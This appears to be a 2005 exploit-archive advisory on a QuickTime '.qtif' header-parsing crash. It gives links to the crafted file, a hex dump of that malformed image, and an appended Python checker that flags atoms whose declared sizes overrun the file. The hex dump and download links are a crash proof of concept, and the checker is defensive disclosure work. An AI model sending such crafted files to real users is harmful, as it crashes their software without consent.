Apple QuickTime 6.5.2.10 – ‘.qtif’ Image Parsing

Vulnerability ID: 1054869
Vulnerability type:
Published: 2005-01-24
Updated: 2005-01-24
CVE ID: N/A
CNNVD-ID: N/A
Platform: Windows
CVSS score: N/A
|Vulnerability source
https://www.exploit-db.com/exploits/770
|Vulnerability details
Vulnerability details have not been disclosed.
|Exploit (EXP)
# Added qtif on milw0rm's sploits archive/ /str0ke #

Application: QuickTime
            http://www.apple.com/quicktime/

AFFECTED VERSION:
Versions verified to be vulnerable:
QuickTime.qts (6.5.2.10) and prior versions are affected.

The bug:
The problem specifically exists when the QuickTime.qts component parses
(.qtif) image files that contain an incomplete header.
A remote user can create a file that, when processed by QuickTime PictureViewer or via a browser,
can cause the remote system to crash.

--Uncompleted qtif image file header
http://www.atmacasoft.com/exp/vuln.qtif.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/770.qtif (vuln.qtif)

00000000 0000 005E 6964 7363 0000 0056 6A70 6567 0000 0000 0000 0000 0000 0000 ...^idsc...Vjpeg............
0000001C 6170 706C 0000 0000 0000 0200 0100 016D 0048 0000 0048 0000 0000 724D appl...........m.H...H....rM
00000038 0001 0C50 686F 746F 202D 204A 5045 4700 0000 0000 0000 0000 0000 0000 ...Photo - JPEG.............
00000054 0000 0000 0000 0018 FFFF 0000 7255 6964 6174 FFD8 FFE0 0010           ............rUidat......

VENDOR RESPONSE:
No vendor response.

Discovered by ATmaCA
AtmacaSoft Inc.
http://www.atmacasoft.com

# milw0rm.com [2005-01-24]
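
A pre-parse sanity check for the condition shown in the hex dump, as an added example that is not part of the original advisory or of QuickTime: it walks the top-level atoms (4-byte big-endian size, 4-byte type) and rejects a file whose declared atom sizes exceed the bytes actually present. Assuming the dump is the complete file, its `idat` atom at offset 0x5E declares 0x7255 bytes while only 6 bytes of data follow; the helper names and both sample files below are constructed for illustration.

```python
import struct

HEADER = 8  # 4-byte big-endian size + 4-byte type, per the QuickTime atom layout

def walk_atoms(data):
    """Walk top-level atoms; return (offset, type, declared_size, problem) tuples."""
    found, off = [], 0
    while off < len(data):
        remaining = len(data) - off
        if remaining < HEADER:
            found.append((off, None, None, "truncated atom header"))
            break
        size, kind = struct.unpack_from(">I4s", data, off)
        kind = kind.decode("latin-1")
        if size < HEADER:
            # Sizes 0 and 1 have special meanings in QuickTime atoms; this
            # narrow check rejects them (assumption made for this example).
            found.append((off, kind, size, "declared size below header size"))
            break
        if size > remaining:
            found.append((off, kind, size,
                          f"declares {size} bytes, only {remaining} present"))
            break
        found.append((off, kind, size, None))
        off += size
    return found

def is_well_formed(data):
    """True only if every atom fits in the file and both idsc and idat exist."""
    atoms = walk_atoms(data)
    kinds = {a[1] for a in atoms}
    return all(a[3] is None for a in atoms) and {"idsc", "idat"} <= kinds

def atom(kind, payload, declared=None):
    """Build an atom; `declared` overrides the size field (hypothetical helper)."""
    size = HEADER + len(payload) if declared is None else declared
    return struct.pack(">I4s", size, kind) + payload

# Constructed samples: an 86-byte image description ('jpeg', rest zeroed).
DESC = struct.pack(">I4s", 86, b"jpeg") + bytes(78)
GOOD = atom(b"idsc", DESC) + atom(b"idat", b"\xff\xd8\xff\xd9")
# Same shape as the dump: idat claims 0x7255 bytes, 6 bytes of data follow.
TRUNCATED = atom(b"idsc", DESC) + atom(b"idat", b"\xff\xd8\xff\xe0\x00\x10",
                                       declared=0x7255)

if __name__ == "__main__":
    for name, blob in (("GOOD", GOOD), ("TRUNCATED", TRUNCATED)):
        print(name, is_well_formed(blob), walk_atoms(blob))
```

A check like this belongs in front of any image parser that trusts length fields, for example in a mail or web gateway that triages attachments before they reach a viewer.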
